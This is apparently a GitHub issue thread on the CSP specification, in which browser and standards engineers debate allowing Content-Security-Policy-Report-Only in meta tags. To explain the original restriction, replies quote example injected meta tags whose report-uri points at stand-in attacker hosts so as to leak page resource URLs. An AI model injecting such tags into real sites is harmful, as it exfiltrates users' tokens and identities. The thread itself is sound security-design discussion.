Allow CSP-Report-Only in meta tags.

[ScottHelme]

The CSP 3 spec does not allow Content-Security-Policy-Report-Only headers in meta tags. This can prevent sites from safely testing CSP prior to enforcing the policy with a Content-Security-Policy meta tag.

I'd like to allow site operators who can only deploy CSP via meta tags the option to safely test their policy. Prime examples of this are GitHub pages and hosted platforms like Ghost.

I'm not sure why CSPRO is restricted from meta, can anyone provide the reason?

I'm working with many sites (via my CSP reporting service https://report-uri.com) that currently have exactly this issue so it'd be great to see if we can do something for them in the spec.

[dhausknecht]

Unfortunately I cannot find the discussion about it anymore from the early days of CSP. IIRC it was on the W3C WebAppSec mailing list(?). Anyway, the reason was as follows:

It is to mitigate the effects of HTML injection attacks and the abuse of CSP. That is if you can inject

<meta http-equiv="Content-Security-Policy" content="report-uri evil.com/reports">

it is invisible but you can use it as a data channel out. Even worse:

<meta http-equiv="Content-Security-Policy-Report-Only" content="default-src 'none'; report-uri evil.com/reports">

is invisible and sends out everything that is loaded. This becomes interesting for example when you have URLs like a.com/user/scotthelme/ or something.

Therefore report-uri was removed from <meta>. And CSPRO without report-uri does not make any sense, does it?
It certainly does not eliminate the general problem of data exfiltration from a page. But it tries to at least not add yet another channel.

[ScottHelme]

CSPRO without the report-uri directive would still be useful because you can handle reporting yourself using the SecurityPolicyViolation event: #255

I can't see a downside to this, but that doesn't mean there isn't one! If the attacker can inject script to do this themselves then it's already game over. Is there a problem to enabling CSPRO in meta?

[dhausknecht]

good point! I completely forgot about it when responding. As I said, the arguments were made long time ago when no such event was ever thought of. This certainly does change the game...

@mikewest @andypaicu ping ping ping :-D

[mikewest]

As far as I can recall, the argument against putting reporting into <meta> boiled down to malicious injection, along the lines @dhausknecht notes above. default-src 'none'; report-uri https://attacker.site/ leaks the URL of ~every resource on the page, including interesting information like tokens or usernames, and does so without requiring script execution.

That said, I agree that firing a SecurityPolicyViolation event is significantly less risky than sending violation reports. There's probably not substantial risk in allowing something like the following inside <head>:

<meta
  http-equiv="Content-Security-Policy-Report-Only"
  content="[something that does not contain `report-uri`]">

+@dveditz, @andypaicu

[andypaicu]

When the decision was made the violation event was not on the table so the sole purpose of a CSPRO header was to send reports which meant that we could just blanket block CSPRO headers delivered in meta tags. Since we have events there is a use case for CSPRO headers in meta tags.

IIRC we currently ignore the report-uri directive for CSP headers in meta tags so we can do the same thing for CSPRO headers.

@ckerschb @dveditz - any objections to this?

[arturjanc]

FWIW I like this proposal as well -- it helps developers safely deploy CSP on static HTML pages (which in some cases can't set response headers and have to use <meta>) without requiring them to go directly to enforcing mode.

I can't think of a way this can be abused if setting CSPRO doesn't allow specifying report-uri; but perhaps, as a defense in depth, we could require that the CSPRO <meta> tag is a descendant of document.head? This way injections later on in the DOM would not be able to inject CSP and affect the behavior of the document. I believe some user agents might already enforce this restriction for
<meta http-equiv="Content-Security-Policy"> so it shouldn't be a significant constraint for developers.

[annevk]

I noticed this rather late, but I really wish we'd stop with meta-element based policies. They are extremely brittle and create a ton of edge cases that are usually largely ignored and undertested.

[dveditz]

And yet lots of content is still hosted on services that don't give authors the ability to set HTTP headers (this site, for one example). No one likes it, but there's a reason they keep getting added to specs.

[mikewest]

I think we can drop <meta> if we do the work of creating an API to allow programmatic tightening of policy enforcement for a given document (perhaps along the lines of the not-even-half-completed sketch in https://w3c.github.io/webappsec-csp/api/?). Thus far, no one has been willing to spend the time to do that work (though @arturjanc asks for it every now and again).

In the absence of such an API, it doesn't seem unreasonable to give developers the ability to test out a policy via in-page events.